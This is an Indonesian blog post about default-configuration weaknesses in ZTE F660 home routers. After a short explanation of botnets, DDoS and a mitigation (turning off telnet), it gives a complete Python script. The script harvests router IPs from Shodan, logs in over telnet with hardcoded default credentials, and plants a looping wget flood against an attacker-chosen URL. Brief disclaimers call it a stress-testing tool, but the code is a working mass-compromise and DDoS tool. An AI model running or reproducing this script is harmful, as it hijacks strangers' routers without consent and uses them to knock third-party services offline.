ZTE F660 ini merupakan sebuah perangkat router modem yang banyak di gunakan di rumah-rumah. Biasanya di gunakan oleh pelanggan in*****. Alat ini jika terkonfigurasi secara default tanpa ada melakukan patching dapat di manfaatkan oleh seseorang. Cara sederhana untuk melakukan patching dengan mematikan layanan telnet, dapat di lakukan melalui bagian administratornya.
Default konfigurasi merupakan salah satu yang dapat di manfaatkan untuk membangun botnet dalam sekala besar. BOTNET merupakan zombi perangkat yang terhubung dengan internet dalam sekala besar. BOTNET dapat di manfaatkan seseorang yang ingin melakukan DDos yang berakibat fatal terhadap target yang di serang. DDos merupakan serangan yang memberikan beban terhadap layanan target yang diserang sehingga layanan itu over dosis (hang over). Pada jaman ini hal ini seharusnya terhindar yang dimana ada banyak device yang terkoneksi dengan internet. Apalagi kedepan akan di terapkannya AI pada rumah pintar yang di dalamnya semua terkoneksi dengan internet. Apabila hal seperti ini masih terjadi pada perangkat yang terhubung ke internet akibatnya akan fatal, seseorang bisa jadi akan membuat botnet dalam sekala yang sangat besar sehingga dapat melumpuhkan layanan-layanan yang diserangnya.
Pada kasus ini saya memberikan sample botnet yang memanfaatkan kelemahan default konfigurasi pada perangkat seperti ZTE F66.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import string | |
import mechanize | |
import socket | |
import Queue | |
import threading | |
import time | |
import sys | |
def scrap_ip(param): | |
br = mechanize.Browser() | |
br.set_handle_robots(False) | |
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36')] | |
respone = br.open("https://www.shodan.io/search?query="+param) | |
ip = [] | |
for link in br.links(): | |
link_ip = link.text | |
tmp = link_ip.split(".") | |
if (tmp[0].isdigit() and tmp[1].isdigit() and tmp[2].isdigit() and tmp[3].isdigit()): | |
tmp = tmp[0]+'.'+tmp[1]+'.'+tmp[2]+'.'+tmp[3] | |
ip.append(tmp) | |
return ip | |
def run(ip, target): | |
try: | |
serv = socket.socket() | |
print "Attack on --> "+ip | |
serv.connect((ip, 23)) | |
# print serv.recv(1024) | |
serv.sendall("root\n") | |
# print serv.recv(1024) | |
serv.sendall("Zte521\n") | |
# print serv.recv(1024) | |
serv.sendall("cd tmp\n") | |
# print serv.recv(1024) | |
serv.sendall("echo 'while true; do (wget -qO/dev/null "+target+" &) > /dev/null; done' >> dukun_cyber.sh \n") | |
# print serv.recv(1024) | |
serv.sendall("sh dukun_cyber.sh &\n") | |
while True: | |
serv.recv(1024) | |
except: | |
pass | |
def banner(): | |
print """ | |
__________ _____ ____ ____ ___ ____ | |
|__ /_ _| ____| | _ \| _ \ / _ \/ ___| | |
/ / | | | _| | | | | | | | | | \___ \ | |
/ /_ | | | |___ | |_| | |_| | |_| |___) | | |
/____| |_| |_____| |____/|____/ \___/|____/ | |
Code Name ---> pendekar_langit. | |
Please use Penetration testing don't | |
use for attacking. | |
Please install mechanize lib first. | |
sudo pip install mechanize | |
Blog : http://learningbasicnetwork.blogspot.com. | |
Github : https://github.com/suryadana. | |
Target ex: http://example.com/anu.png. | |
Help : python zte-ddos.py help | |
""" | |
def help_use(): | |
print "Uses : python zte-ddos.py http://example.com/anu.png\n" | |
def main(): | |
banner() | |
if len(sys.argv) == 1: | |
help_use() | |
else: | |
if sys.argv[1] != "help": | |
while True: | |
print "\nNew Target" | |
ips = scrap_ip("F660 Login:") | |
for ip in ips: | |
t = threading.Thread(target=run, args=(ip, sys.argv[1],)) | |
t.daemon = True | |
t.start() | |
time.sleep(120) | |
else: | |
help_use() | |
if __name__ == '__main__': | |
main() |
Jangan di gunakan untuk melakukan serangan ini saya buat hanya untuk melakukan strestesting saja.
0 comments:
Post a Comment